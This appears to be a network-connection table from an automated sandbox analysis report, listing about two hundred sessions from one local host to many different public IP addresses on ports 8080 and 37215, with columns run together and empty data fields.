                                                        19929192.168.2.235960634.189.165.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19930192.168.2.234401671.45.72.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19931192.168.2.2344368174.176.109.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19932192.168.2.2356892173.124.194.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19933192.168.2.2353558222.227.158.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19934192.168.2.2353268195.105.134.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19935192.168.2.2339176197.83.214.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19936192.168.2.2351790142.43.18.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19937192.168.2.2352138104.191.222.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19938192.168.2.2353114130.101.161.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19939192.168.2.235735812.27.60.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19940192.168.2.2339022199.203.86.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19941192.168.2.2339218189.206.7.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19942192.168.2.2345338105.10.237.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19943192.168.2.235457895.96.37.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19944192.168.2.23494985.240.191.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19945192.168.2.2358758137.196.146.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19946192.168.2.2354164184.67.180.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19947192.168.2.2341050157.116.40.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19948192.168.2.2359592219.16.148.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19949192.168.2.2343528136.159.184.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19950192.168.2.2342144107.48.102.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19951192.168.2.2356448171.80.162.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19952192.168.2.2354110163.191.247.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19953192.168.2.2353616138.150.219.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19954192.168.2.23414525.228.59.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19955192.168.2.2344422155.166.251.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19956192.168.2.235103272.114.21.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19957192.168.2.2342072159.151.174.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19958192.168.2.235751266.72.82.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19959192.168.2.2339948223.250.170.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19960192.168.2.233321453.44.177.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19961192.168.2.233412284.128.165.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19962192.168.2.233961092.94.91.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19963192.168.2.2353962104.49.6.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19964192.168.2.2356656199.37.172.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19965192.168.2.2359880140.74.163.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19966192.168.2.2338558102.161.131.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19967192.168.2.235287257.67.248.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19968192.168.2.2353230107.31.158.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19969192.168.2.2340842101.17.46.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19970192.168.2.2359598165.116.229.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19971192.168.2.2359802105.254.239.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19972192.168.2.2356116110.155.95.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19973192.168.2.2347084219.254.39.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19974192.168.2.2352612172.244.216.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19975192.168.2.2356924174.37.211.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19976192.168.2.2345118154.30.66.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19977192.168.2.235547084.158.46.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19978192.168.2.234498686.0.142.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19979192.168.2.2343614124.188.117.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19980192.168.2.235494088.214.34.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19981192.168.2.2338348147.201.173.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19982192.168.2.234489825.192.227.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19983192.168.2.234242882.146.151.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19984192.168.2.234608094.230.221.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19985192.168.2.2351364180.42.130.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19986192.168.2.2346440211.9.77.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19987192.168.2.234173657.176.17.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19988192.168.2.233344271.214.219.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19989192.168.2.2360126152.30.62.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19990192.168.2.2343988210.49.1.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19991192.168.2.2359188116.41.66.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19992192.168.2.23599288.97.77.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19993192.168.2.2337478183.206.38.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19994192.168.2.234827444.240.255.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19995192.168.2.236058886.198.198.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19996192.168.2.2337184208.31.63.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19997192.168.2.235059648.189.12.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19998192.168.2.2357642192.222.151.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19999192.168.2.234314624.183.154.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20000192.168.2.2343820137.207.230.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20001192.168.2.2358790137.209.193.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20002192.168.2.2346028179.41.36.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20003192.168.2.235614272.145.20.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20004192.168.2.23505484.131.161.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20005192.168.2.2340128126.203.125.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20006192.168.2.235186261.211.237.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20007192.168.2.2348958112.191.58.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20008192.168.2.2337312196.77.205.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20009192.168.2.233544025.7.201.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20010192.168.2.2344556222.186.97.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20011192.168.2.233683060.192.3.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20012192.168.2.2348780165.205.2.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20013192.168.2.2343372189.72.155.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20014192.168.2.2348104101.23.130.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20015192.168.2.2354326103.83.66.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20016192.168.2.2354834178.39.176.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20017192.168.2.233464276.186.54.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20018192.168.2.234533220.143.159.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20019192.168.2.2359956122.248.117.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20020192.168.2.2343882124.187.98.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20021192.168.2.2359364156.43.126.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20022192.168.2.2335034210.254.117.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20023192.168.2.2342450173.203.150.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20024192.168.2.234239613.72.161.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20025192.168.2.234305681.3.127.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20026192.168.2.2337168154.95.185.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20027192.168.2.2359360204.95.34.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20028192.168.2.2346442130.112.99.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20029192.168.2.2359780174.105.168.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20030192.168.2.234711237.165.142.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20031192.168.2.233609861.163.240.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20032192.168.2.233366677.37.240.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20033192.168.2.2334146175.45.237.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20034192.168.2.2342508119.29.246.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20035192.168.2.2341606163.234.83.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20036192.168.2.235143831.109.0.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20037192.168.2.2332834122.151.152.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20038192.168.2.2351882181.45.82.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20039192.168.2.233650232.245.60.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20040192.168.2.235339660.199.183.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20041192.168.2.2335394170.135.83.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20042192.168.2.2351822139.130.189.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20043192.168.2.234606283.213.244.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20044192.168.2.235189425.254.19.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20045192.168.2.233548632.79.78.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20046192.168.2.234098668.56.81.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20047192.168.2.2351850134.166.179.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20048192.168.2.2349762157.51.183.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20049192.168.2.2350766157.245.161.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20050192.168.2.234121041.151.28.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20051192.168.2.2334266157.45.247.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20052192.168.2.235842890.116.251.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20053192.168.2.233524441.246.151.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20054192.168.2.2347764197.114.182.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20055192.168.2.234696241.122.89.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20056192.168.2.23403181.225.145.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20057192.168.2.2335032197.71.54.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20058192.168.2.2354910197.17.36.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20059192.168.2.234642641.46.219.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20060192.168.2.2340672157.7.21.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20061192.168.2.2347254157.46.28.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20062192.168.2.234407461.220.86.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20063192.168.2.235654441.225.175.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20064192.168.2.2352542157.180.30.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20065192.168.2.2344924197.152.112.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20066192.168.2.2355420157.20.56.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20067192.168.2.234850650.231.231.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20068192.168.2.2356060197.116.14.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20069192.168.2.2344956157.102.36.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20070192.168.2.235188441.5.33.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20071192.168.2.2333470150.29.69.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20072192.168.2.235814241.143.152.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20073192.168.2.2344158157.176.31.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20074192.168.2.2343988157.137.207.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20075192.168.2.235085041.181.17.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20076192.168.2.2346746197.236.230.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20077192.168.2.233370423.67.44.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20078192.168.2.234522692.197.195.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20079192.168.2.2345382197.127.82.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20080192.168.2.2352276197.240.142.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20081192.168.2.233305241.163.12.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20082192.168.2.233509034.88.8.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20083192.168.2.235509214.175.43.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20084192.168.2.2337642157.54.50.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20085192.168.2.2341672157.240.207.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20086192.168.2.2346532197.134.93.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20087192.168.2.234141661.173.201.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20088192.168.2.235972092.233.96.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20089192.168.2.2357162165.28.194.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20090192.168.2.2357304142.110.191.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20091192.168.2.2350886197.193.225.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20092192.168.2.2355770197.92.47.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20093192.168.2.2335938197.3.16.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20094192.168.2.2338540157.90.185.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20095192.168.2.234016441.61.168.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20096192.168.2.235371841.141.81.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20097192.168.2.2352546197.135.118.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20098192.168.2.235836441.61.35.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20099192.168.2.2350410157.240.185.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20100192.168.2.2352852197.170.16.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20101192.168.2.2336514120.218.172.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20102192.168.2.2339706157.233.250.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20103192.168.2.235966286.179.120.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20104192.168.2.2360714197.133.148.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20105192.168.2.2343336157.34.97.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20106192.168.2.235284266.91.246.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20107192.168.2.2354406103.163.107.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20108192.168.2.235285641.3.50.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20109192.168.2.2338928197.227.133.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20110192.168.2.2349938157.65.5.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20111192.168.2.2337430123.221.124.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20112192.168.2.235332241.173.161.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20113192.168.2.2348688197.10.152.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20114192.168.2.2360074197.37.189.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20115192.168.2.2350278157.120.249.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20116192.168.2.235409441.100.172.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20117192.168.2.2343066217.245.215.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20118192.168.2.233506841.19.228.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20119192.168.2.2336384157.140.168.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20120192.168.2.2352148197.40.115.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20121192.168.2.234111642.46.141.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20122192.168.2.2341534157.196.35.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20123192.168.2.2345270197.173.36.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20124192.168.2.2359032197.92.228.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20125192.168.2.2356880157.58.189.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20126192.168.2.233432041.166.94.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20127192.168.2.2351030197.8.68.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20128192.168.2.235516441.79.103.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20129192.168.2.2338754197.191.159.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20130192.168.2.2334906197.124.197.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20131192.168.2.233509841.240.119.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20132192.168.2.2352666157.77.197.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20133192.168.2.2346514157.242.166.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20134192.168.2.235785017.7.159.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20135192.168.2.2357928197.60.66.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20136192.168.2.2340096197.208.69.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20137192.168.2.2346732197.114.158.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20138192.168.2.2337074157.130.166.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
